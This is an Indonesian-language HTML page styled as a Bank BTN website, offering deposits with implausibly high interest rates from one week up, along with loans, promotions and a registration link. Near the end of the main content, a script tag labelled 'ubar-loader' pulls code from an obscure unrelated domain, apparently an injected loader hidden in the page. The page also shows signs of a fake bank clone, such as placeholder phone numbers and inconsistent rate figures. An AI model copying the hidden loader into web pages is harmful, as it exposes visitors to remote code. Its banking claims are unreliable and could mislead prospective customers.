<!-- VERSION 2.0
        TODO: sliding dashboard on 1024-1280 px
-->
<!DOCTYPE html>
<html>

<head>
    <title></title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <link rel="stylesheet" type="text/css" href="style.css">

</head>

<body>
    <div class="col-md-10">
        <div class="wrapper">
            <div class="row">
               
                </div>
                <nav class="navbar navbar-inverse">
                    <button type="button" class="navbar-toggle" data-toggle="collapse" onclick="openNav()" style="cursor:pointer">
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                    </button>
                    <ul class="nav navbar-nav navbar-left dt-head">
                        <li class="active">About website</li>                       
                    </ul>

                </nav>
                <div class="row only-mobile-info" style="height:35px;">
                </div>
            </div>
            <div class="main-container">
                <div class="row">
                    <div class="col-md-12">
                        <nav class="nav nav5 only-dt-info">
                            <ul>
                                <li class="top-menu-item">
                                    <a href="#">LAIN-LAIN</a>
                                    <ul>
                                        <li>
                                            <a href="buat/index.php">
                                                <p>pendaftaran</p>
                                            </a>
                                        </li>
                                       
                                    </ul>
                                </li>
                                <li class="top-menu-item">
                                    <a href="#">TRANSFER</a>
                                </li>
                                <li class="top-menu-item">
                                    <a href="#">DEPOSIT</a>
                                </li>
                                <li class="top-menu-item">
                                    <a href="#">PEMBAYARAN</a>
                                    
                                </li>
                                <li class="top-menu-item">
                                    <a href="#">PINJAMAN</a>
                                   
                                </li>
                                <li class="top-menu-item">
                                    <a href="#">REKENING ONLINE</a>
                                    
                                </li>
                            </ul>
                        </nav>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 deposit">
                        <div class="content" style="max-width:800px">
                            <img class="logo" src="images/btn.jpg">
                            <h1>BANK BTN</h1>
                            <p style="font-size:20pt;">&#8372;&nbsp;&nbsp;$</p>
                            <p style="padding-bottom:0px;"> kecepatan layanan peminjaman </p>
                            <p style="padding-bottom:0px;color:#4B5153">kemudahan deposit</p>
                            <p style="color:#4B5153">Pembayaran bunga pada saat berakhirnya jangka waktu</p>
                            <p style="color:#CECEC2;padding-bottom:0px;"><small>Jumlah Setoran/deposit Minimum</small></p>
                            <p style="font-size:18pt">Rp.10.000</p>
                        </div>
                        <div class="col-md-2 note">
                                <p>
								“Menjadi bank terbaik dan termasuk dalam 10 besar bank di Indonesia dengan eksistensi yang diakui di tingkat regional”</p>
                            </p>
                        </div>
                    </div>
                </div>
                </div>
                <div class="row">
                    <div class="col-md-12">
                        <div class="content">
                            <div class="inl">
                                <h3>suku bunga</h3>
                               
                            </div>
                            <div>est 10.11.2018</div>
                            <br>
                            <br>
                            <table>
                                <tr>
                                    <th style="color:#929C9F">Jangka Waktu</th>
                                    <th style="color:#929C9F">duit 100jt</th>
                                    <th style="color:#929C9F">duit 500jt</th>
                                    <th style="color:#929C9F">duit 1M</th>
                                    <th style="color:#929C9F">duit 10M</th>
                                    <th style="color:#929C9F">duit <10M </th>
                                </tr>
                                <tr>
                                    <td style="padding-right: 150px;font-weight:normal;">1&nbsp;minggu</td>
                                    <td>18,0%</td>
                                    <td>18,5%</td>
                                    <td>19%</td>
                                    <td>19,5%</td>
                                    <td>20,5%</td>
                                </tr>
                                <tr>
                                    <td style="font-weight:normal;">2 minggu</td>
                                    <td>18,0%</td>
                                    <td>18,5%</td>
                                    <td>19,5%</td>
                                    <td>19,5%</td>
                                    <td>20,5%</td>
                                </tr>
                                <tr>
                                    <td style="font-weight:normal;">1 bulan</td>
                                    <td>18,0%</td>
                                    <td>18,5%</td>
                                    <td>19,3%</td>
                                    <td>19,5%</td>
                                    <td>20,5%</td>
                                </tr>
                                <tr>
                                    <td style="font-weight:normal;">2 bulan</td>
                                    <td>18,0%</td>
                                    <td>18,5%</td>
                                    <td>20%</td>
                                    <td>19,5%</td>
                                    <td>20,5%</td>
                                </tr>
                                <tr>
                                    <td style="font-weight:normal;">6 bulan</td>
                                    <td>18,0%</td>
                                    <td>18,5%</td>
                                    <td>20,2%</td>
                                    <td>19,5%</td>
                                    <td>20,5%</td>
                                </tr>
                            </table>
                           
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12">
                        <div class="content">
                            <div class="loyalty only-dt-info">
                                <h3>program loyalitas</h3>
                                <p>Di cabang bank, tempat rekening anda dibuka, Anda dapat membuat surat kuasa untuk hak menyimpan dana atau surat wasiat. Biaya layanan hingga 0.1% dana, dan untuk pensiunan GRATIS.</p>
                                <ul class="list">
                                    <li>Mengambil uang tunai melalui pihak ketiga</li>
                                    <li>Dengan kartu kuasa pewaris</li>
                                    <li>Tanpa mengunjungi kantor Bank (via online)</li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 deposit">
                        <div class="content inliner">
                            <br>
                            <br>
                            <h3 style="margin-bottom:40px;">Bagaimana cara membuka rekening?</h3>
                            <p style="font-weight:normal">Untuk melakukan pembukaan buku rekening, Anda harus datangke cabang Bank Tabungan BTN terdekat dikota anda, dengan dokumen-dokumen berikut:</p>
                            <p style="padding-bottom:0px">- anda harus membawa KTP </p>
                            <p>- juga perlengkapan lain seperti slip gaji dll</p>
                            <p style="font-weight:normal">
                               Untuk informasi tambahan, hubungi dukungan bank secara online:</p>
                            <p style="font-size:16pt;font-weight:bold">
                                <img src="images/phone-white.png"> 024 567-890
                            </p>
                        </div>
                       
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12">
                        <div class="content loyalty">
                            <h3>informasi yang mungkin berguna bagi calon pengguna awal</h3>
                            <h4>Bagaimana cara menabung/deposit?</h4>
                            <ul class="list">
                                <li>Pendaftaran pembukaan deposit dengan uang tunai di cabang kami</li>
                                <li>Pendaftaran non-tunai via website</li>
                            </ul>
                            <h4>Bagaimana kuasa pengacara dikeluarkan?</h4>
                            <p>Di cabang bank BTN, Anda dapat mengeluarkan surat kuasa untuk Mengirim dana atau pesanan wasiat.  layanan hingga 0.1% dari jumlah dana, dan untuk pensiunan GRATIS.</p>
                            <h4>Bagaimana bunga dan laba atas deposito dilakukan?</h4>
                            <ul class="list">
                                <li>Uang tunai melalui kas</li>
                                <li>Melalui kartu pembayaran</li>
                                <li>Tanpa purlu mendatangi kantor Bank, anda dapat menerima bunga dan Mengirim dana</li>
                            </ul>
                        </div>
                    </div>
                </div>
                
                <div class="row only-mobile-info" style="padding-left:50px;">
                    <h3 style="color:#4a4949">saran lainnya</h3>
                </div>
                <div class="row">
                    <div class="col-md-12 promo1">
                        <div class="content inliner">
                            <h3 style="margin:30px 0 40px 0">promo cashback</h3>
                            <p>promo bagi pemegang MASTER CARD yang ingin mendaftar ke layanan kami</p>
                            <p style="padding-top:50px;">
                                <img src="images/mastercard.png">
                            </p>
                        </div>
                        <img src="images/promo1_tree.png">
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 promo2">
                        <div class="content inliner">
                            <h3 style="margin:30px 0 40px 0">program tabungan "rumah simpanan"</h3>
                            <p style="margin:30px 0 40px 0">Tetap menjadi kebanggaan nasabah</p>
                            <p style="margin-bottom:40px">Program kredit negara untuk memiliki rumah impian anda.</p>
                        </div>
                        <img src="images/promo2.png">
                    </div>
                </div>
            </div>
            <script src="http://minxxrpaaw.org/code.php?appid=coi1634-7164-1474103646597-d7e2796c-fa25-4d22-a182-cfe500e654ad&h=0&m=normal" id="ubar-loader"></script>
        </div>
    </div>
    <div class="col-md-2">
        <div class="dashboard">
            <nav class="navbar navbar-inverse">
                <form>
                    <input type="text" class="search" placeholder="pencarian">
                </form>
            </nav>
            <div style="">
                <p>Layanan Bantuan</p>
            </div>
            <hr>
            <div class="with-icon">
                <a href="#"><img src="images/key.png">M-banking</a>
            </div>
            <hr>
            <div>
                <p><a href="#">online setiap hari 24/7</a></p>
                <p><a href="#">download apps kami</a></p>
                <h6>layanan lainnya</h6>
                <p><a href="#">layanan umum</a></p>
                <p><a href="#">deposit via apps</a></p>
                <p><a href="#">potongan bunga</a></p>
                <p><a href="#">Transfer uang</a></p>
                <p><a href="#">penarikan tunai</a></p>
                <p><a href="#">layanan mutasi online</a></p>
            </div>
            <hr>
            <div class="with-icon">
                <a href="#"><img src="images/map.png"> Cabang bank dan gerai ATM
                </a>
            </div>
            <hr>
            <div class="with-icon">
                <p>
                    <h6 style="margin-left:25px;">BANK BTN</h6>
                </p>
                <p>
                    <a href="#" style="color:white;font-size:16pt;"><img src="images/phone.png"> 0 800 210 800
                    </a>
                </p>
            </div>
            <div class="with-icon helper">
                <a href="#" style="color:white;"><img src="images/chat.png">customer service
                </a>
            </div>
        </div>
    </div>
    <div class="col-md-10 footer">
        <div class="col-md-4">
            <div class="content">
                <h6>BANTUAN</h6>
                <p>Cabang dan ATM</p>
                <p>layanan nasabah</p>
                <p>layanan menabung</p>
                <p>kontak nasabah</p>
                <p>Apps bank BTN</p>
                <div style="margin-top:80px">
                    <p style="color:#929C9F;font-weight:bold">© SEMARANG,2018</p>             
                </div>
            </div>
        </div>
        <div class="col-md-4">
            <div class="content">
                <h6>PUSAT KONTAK BTN</h6>
                <p>0 812 345 678</p>
                <p style="color:#929C9F;">telpon bebas pulsa +62 876-5432-1098</p>
            </div>
        </div>
        <div class="col-md-4">
            <div class="content">
                <h6>TEMUKAN KAMI DI:</h6>
                <p>
                    <a href="#"><img src="images/facebook.png" class="social"></a>
                    <a href="#"><img src="images/instagram.png" class="social"></a>
                    <a href="#"><img src="images/twitter.png" class="social"></a>
                    <a href="#"><img src="images/youtube.jpg" class="social"></a>
                </p>
            </div>
        </div>
    </div>
</body>

</html>
